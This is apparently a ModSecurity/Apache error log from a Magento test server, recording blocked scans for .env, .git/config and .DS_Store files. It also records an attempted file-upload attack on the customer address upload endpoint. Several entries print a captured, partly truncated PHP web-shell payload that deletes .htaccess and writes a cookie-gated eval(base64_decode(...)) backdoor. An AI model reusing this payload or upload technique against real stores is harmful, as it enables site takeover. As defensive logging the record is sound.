[Thu Dec 18 07:23:37.341499 2025] [:error] [pid 813218] [client 146.190.103.103:33894] [client 146.190.103.103] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUOd6Z5vyU4YKdXrlw0wGwAAAAY"]
[Thu Dec 18 07:23:37.341747 2025] [:error] [pid 813218] [client 146.190.103.103:33894] [client 146.190.103.103] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUOd6Z5vyU4YKdXrlw0wGwAAAAY"]
[Thu Dec 18 07:23:37.341960 2025] [:error] [pid 813218] [client 146.190.103.103:33894] [client 146.190.103.103] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUOd6Z5vyU4YKdXrlw0wGwAAAAY"]
[Thu Dec 18 07:23:38.390521 2025] [:error] [pid 813047] [client 146.190.103.103:33896] [client 146.190.103.103] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUOd6ov7L13Uut7O3fEkMQAAAAU"]
[Thu Dec 18 07:23:38.390761 2025] [:error] [pid 813047] [client 146.190.103.103:33896] [client 146.190.103.103] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUOd6ov7L13Uut7O3fEkMQAAAAU"]
[Thu Dec 18 07:23:38.390925 2025] [:error] [pid 813047] [client 146.190.103.103:33896] [client 146.190.103.103] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUOd6ov7L13Uut7O3fEkMQAAAAU"]
[Thu Dec 18 07:23:40.403032 2025] [:error] [pid 813019] [client 146.190.103.103:33906] [client 146.190.103.103] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUOd7DZTDxRxH4PwP3ShLgAAAAM"]
[Thu Dec 18 07:23:40.403258 2025] [:error] [pid 813019] [client 146.190.103.103:33906] [client 146.190.103.103] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUOd7DZTDxRxH4PwP3ShLgAAAAM"]
[Thu Dec 18 07:23:40.403417 2025] [:error] [pid 813019] [client 146.190.103.103:33906] [client 146.190.103.103] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUOd7DZTDxRxH4PwP3ShLgAAAAM"]
[Thu Dec 18 10:54:57.803613 2025] [authz_core:error] [pid 813047] [client 206.81.24.74:37664] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Thu Dec 18 10:55:00.803921 2025] [:error] [pid 813018] [client 206.81.24.74:37698] [client 206.81.24.74] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUPPdEBkfFvq8O6HEbsocwAAAAI"]
[Thu Dec 18 10:55:00.804148 2025] [:error] [pid 813018] [client 206.81.24.74:37698] [client 206.81.24.74] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUPPdEBkfFvq8O6HEbsocwAAAAI"]
[Thu Dec 18 10:55:00.804307 2025] [:error] [pid 813018] [client 206.81.24.74:37698] [client 206.81.24.74] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUPPdEBkfFvq8O6HEbsocwAAAAI"]
[Thu Dec 18 10:55:01.813825 2025] [:error] [pid 818374] [client 206.81.24.74:37710] [client 206.81.24.74] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUPPdT8970_eqArficx70gAAAAk"]
[Thu Dec 18 10:55:01.814053 2025] [:error] [pid 818374] [client 206.81.24.74:37710] [client 206.81.24.74] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUPPdT8970_eqArficx70gAAAAk"]
[Thu Dec 18 10:55:01.814209 2025] [:error] [pid 818374] [client 206.81.24.74:37710] [client 206.81.24.74] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUPPdT8970_eqArficx70gAAAAk"]
[Thu Dec 18 10:55:03.812554 2025] [:error] [pid 813370] [client 206.81.24.74:37720] [client 206.81.24.74] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUPPd74E__wGzptGHinuBwAAAAg"]
[Thu Dec 18 10:55:03.812795 2025] [:error] [pid 813370] [client 206.81.24.74:37720] [client 206.81.24.74] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUPPd74E__wGzptGHinuBwAAAAg"]
[Thu Dec 18 10:55:03.812952 2025] [:error] [pid 813370] [client 206.81.24.74:37720] [client 206.81.24.74] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUPPd74E__wGzptGHinuBwAAAAg"]
[Thu Dec 18 13:12:22.690695 2025] [:error] [pid 813218] [client 37.112.219.146:53384] [client 37.112.219.146] ModSecurity: Rule 7f9c6df44be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/f/6f88364f428d25.phar"] [unique_id "aUPvpp5vyU4YKdXrlw0wYgAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 18 13:12:22.691177 2025] [:error] [pid 813218] [client 37.112.219.146:53384] [client 37.112.219.146] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/f/6f88364f428d25.phar"] [unique_id "aUPvpp5vyU4YKdXrlw0wYgAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 18 13:12:22.693559 2025] [:error] [pid 813218] [client 37.112.219.146:53384] [client 37.112.219.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/f/6f88364f428d25.phar"] [unique_id "aUPvpp5vyU4YKdXrlw0wYgAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 18 13:12:22.693755 2025] [:error] [pid 813218] [client 37.112.219.146:53384] [client 37.112.219.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/f/6f88364f428d25.phar"] [unique_id "aUPvpp5vyU4YKdXrlw0wYgAAAAY"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 18 13:12:32.155320 2025] [:error] [pid 813359] [client 37.112.219.146:44654] [client 37.112.219.146] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 6f88364f428d25.php8 found within FILES:custom_attributes[country_id]: 6f88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUPvsLjsQ2OAT5oMPR4ugwAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/6/f/6f88364f428d25.phar
[Thu Dec 18 13:12:32.155962 2025] [:error] [pid 813359] [client 37.112.219.146:44654] [client 37.112.219.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUPvsLjsQ2OAT5oMPR4ugwAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/6/f/6f88364f428d25.phar
[Thu Dec 18 13:12:32.156121 2025] [:error] [pid 813359] [client 37.112.219.146:44654] [client 37.112.219.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aUPvsLjsQ2OAT5oMPR4ugwAAAAc"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/6/f/6f88364f428d25.phar
[Thu Dec 18 13:12:33.345121 2025] [:error] [pid 813359] [client 37.112.219.146:44654] [client 37.112.219.146] ModSecurity: Rule 7f9c6df44be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/f/6f88364f428d25.php8"] [unique_id "aUPvsbjsQ2OAT5oMPR4uhAAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 18 13:12:33.345576 2025] [:error] [pid 813359] [client 37.112.219.146:44654] [client 37.112.219.146] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/f/6f88364f428d25.php8"] [unique_id "aUPvsbjsQ2OAT5oMPR4uhAAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 18 13:12:33.347910 2025] [:error] [pid 813359] [client 37.112.219.146:44654] [client 37.112.219.146] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/f/6f88364f428d25.php8"] [unique_id "aUPvsbjsQ2OAT5oMPR4uhAAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 18 13:12:33.348096 2025] [:error] [pid 813359] [client 37.112.219.146:44654] [client 37.112.219.146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/6/f/6f88364f428d25.php8"] [unique_id "aUPvsbjsQ2OAT5oMPR4uhAAAAAc"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Dec 18 17:48:29.600463 2025] [:error] [pid 813019] [client 134.199.148.145:51530] [client 134.199.148.145] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUQwXTZTDxRxH4PwP3ShgwAAAAM"]
[Thu Dec 18 17:48:29.600736 2025] [:error] [pid 813019] [client 134.199.148.145:51530] [client 134.199.148.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUQwXTZTDxRxH4PwP3ShgwAAAAM"]
[Thu Dec 18 17:48:29.600939 2025] [:error] [pid 813019] [client 134.199.148.145:51530] [client 134.199.148.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUQwXTZTDxRxH4PwP3ShgwAAAAM"]
[Thu Dec 18 17:48:30.095556 2025] [authz_core:error] [pid 813019] [client 134.199.148.145:51530] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
[Thu Dec 18 17:48:30.357801 2025] [authz_core:error] [pid 813019] [client 134.199.148.145:51530] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/laravel-filemanager
[Thu Dec 18 17:48:30.845468 2025] [:error] [pid 813019] [client 134.199.148.145:51530] [client 134.199.148.145] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "662"] [id "920340"] [msg "Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "autumnus.test.indacotrentino.com"] [uri "/"] [unique_id "aUQwXjZTDxRxH4PwP3ShiAAAAAM"]
[Thu Dec 18 17:48:31.565960 2025] [:error] [pid 813019] [client 134.199.148.145:51530] [client 134.199.148.145] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUQwXzZTDxRxH4PwP3ShiwAAAAM"]
[Thu Dec 18 17:48:31.566190 2025] [:error] [pid 813019] [client 134.199.148.145:51530] [client 134.199.148.145] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUQwXzZTDxRxH4PwP3ShiwAAAAM"]
[Thu Dec 18 17:48:31.567308 2025] [:error] [pid 813019] [client 134.199.148.145:51530] [client 134.199.148.145] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aUQwXzZTDxRxH4PwP3ShiwAAAAM"]
[Fri Dec 19 06:39:03.312303 2025] [:error] [pid 834991] [client 37.112.219.146:45688] [client 37.112.219.146] ModSecurity: Rule 7fe1871a9be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/i/1/i188364f428d25.phar"] [unique_id "aUTk93YhSR2R3yAhScQw7QAAAAE"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
